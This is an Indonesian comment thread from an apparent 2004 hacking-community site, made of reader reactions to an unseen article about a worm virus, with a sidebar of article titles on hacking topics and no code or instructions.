Comment : Kalo aku seh asik2 aza yg pentink chatting...Muahahahaha
ID : 10811

Nama : n3wbi35
Comment : Kalo aku seh asik2 aza yg pentink chatting...Muahahahaha
ID : 10810

Nama : n3wbi35
Comment : Kalo aku seh asik2 aza yg pentink chatting...Muahahahaha
ID : 10809

Nama : n3wbi35
Comment : Eh...ngapain pulak sama kaw tosal..Sama si indri la di Salatiga. Ekekkeke botul kata kawantu baru newbie dah kek gitu ngeri fuank -> kata si Suar Sair............................................
ID : 10808

Nama : novan
Comment : bro,.. gpp newbie,.. baru newbie juga dah bisa bikin gini,.. salut ... yang penting gak omong doank ... forza newbie,..
ID : 10806

Nama : Acetosal
Comment : aku ikoot n3wbi35!!!!....... nonton berdua ma aku ajah yah coxxx, cak mesra kita
ID : 10804

Nama : CoreldraW
Comment : mantap banget tuh,..cuman gak paham mas,..gimana nih caranya.
ID : 10802

Nama : satlaser
Comment : wah bingung???? mantra apa tuh?????
ID : 10791

Nama : mifta
Comment : Assalamu'alaikum wr. wb. Terimakasih kepada penulis yang mau berbagi ilmu, karena ilmu yang dibagi bagai pohon yang yang berbuah lebat. Wa'alaikumussalam wr. wb.
ID : 10790

Nama : n3wbi35
Comment : apa kata klenla yg penting lebih asik nonton pelem romantis...
ID : 10787

Nama : n3wbi35
Comment : apa kata klenla yg penting lebih asik nonton pelem romantis...
ID : 10786

Nama : Blinker
Comment : what can i say, everything in purposes for education only it's good, i think :P maju terus semuanya.... biar indonesia semakin berkibar di dunia cyber (malu ama india) hehehehe
ID : 10780

Nama : Watcher
Comment : gmt, kalau Anda merasa lebih tahu, kenapa tidak posting artikel di sini? Ini lebih bermanfaat daripada mengkritik kosong tanpa ada bukti. sevenC, terima kasih untuk artikel Anda yang membuat kita lebih mengerti cara kerja worm virus. :-)
ID : 10775

Nama : [email protected]
Comment : Hmm.. Asik juga artikelnya, Andaikan ada sourcenya langsung... dan bisa di download.
ID : 10766

Nama : mztolo
Comment : Assalamualaikum Wr. Wb. Selamat Ulang Tahun SevenC 19 September Karya Anda Bagus kok... Jangan pernah berhenti tuk menulis...karena itu sangat berarti bagi kita2 yg masih belajar. :) Wassalam...
ID : 10765

Nama : coconut
Comment : gue juga tau kalo banyak bagian dari worm lo yang di comot dari worm generator. tapi, gue ga setuju kalo lo dikatain sama "EXPERT YANG GA MAU BERBAGI PENGETAHUANNYA SAMA ORANG LAIN" yang penting kita dah nyoba utk ga munafik dan mencoba menghargai karya orang. OK? salut...
ID : 10749

Nama : aLva
Comment : mm..................mmmmmmm
ID : 10746

Nama : sevenC
Comment : yaaa... saya cuma newbie bodoh dan masih perlu banyak belajar...maapin aja...
ID : 10740

Nama : sevenC
Comment : yaaa... saya cuma newbie dan masih perlu banyak belajar...maapin aja...
ID : 10739

Nama : yosenux
Comment : woooow.... dahsyat anda memang sangat hebat... takjub bangat ternyata ada orang yang memang ahli..pokonya top abis deh... jika ada orang yang mengatakan worm anda masih ada kekurangan.. pastilah dia yang lamer sejati 100%... terima kasih!!!
ID : 10738

Nama : gmt
Comment : Teknik pemrograman anda masih berantakan dan sangat tidak efisien yg akan menyebabkan ukuran worm anda akan sangat besar. Sub Routine dalam program anda banyak yg diambil dari worm buatan worm generator. anda perlu belajar banyak lagi !!
ID : 10730
 
 
 

Pencarian

  Keyword :              
 
 

 

Artikel Sebelumnya
Menjadi Komentator nomor 1 + hacking jasakom--7/20/2004
Harddisk 400 GB sudah tersedia--7/19/2004
Mengatasi "Hacking account admin portal PhpNuke"--7/19/2004
Best Seller "Seni Internet Hacking"--7/19/2004
Pembuatan Web Portal Menggunakan PhpNuke--7/18/2004
Symbian semakin berkuasa--7/15/2004
Spoofing: KKN Yang Menguntungkan--7/15/2004
Kecoak Elektronik membantah telah melakukan defacing dan minta dana--7/14/2004
VBS sederhana yang berbahaya--7/14/2004
Seminar security di semarang--7/14/2004
Permintaan Dukungan Dana Berlanjut, Situs-Situs Bertumbangan--7/11/2004
MedanHacking Membantah Niat Menyerang KPU--7/11/2004
BUG SMS Satelindo--7/11/2004
Ajukan Permintaan Dana, Situs Golkar.or.id di deface--7/8/2004
Akses Remote Shell Dengan PHP Injection--7/8/2004
Mengirim Email Palsu Menggunakan Script PHP Tanpa MySQL --7/8/2004

Your IP : 202.55.173.2
User Online: 108
© Copyright by Jasakom 2002 All Right Reserved
Informasi disini digunakan untuk tujuan pendidikan, Jasakom tidak bertanggung jawab untuk penyalahgunaan informasi yang ada pada web ini
Gunakan segala bentuk informasi disini secara bijak untuk melindungi diri anda sendiri agar  tidak  menjadi korban internet.
Hosted by www.Geocities.ws

1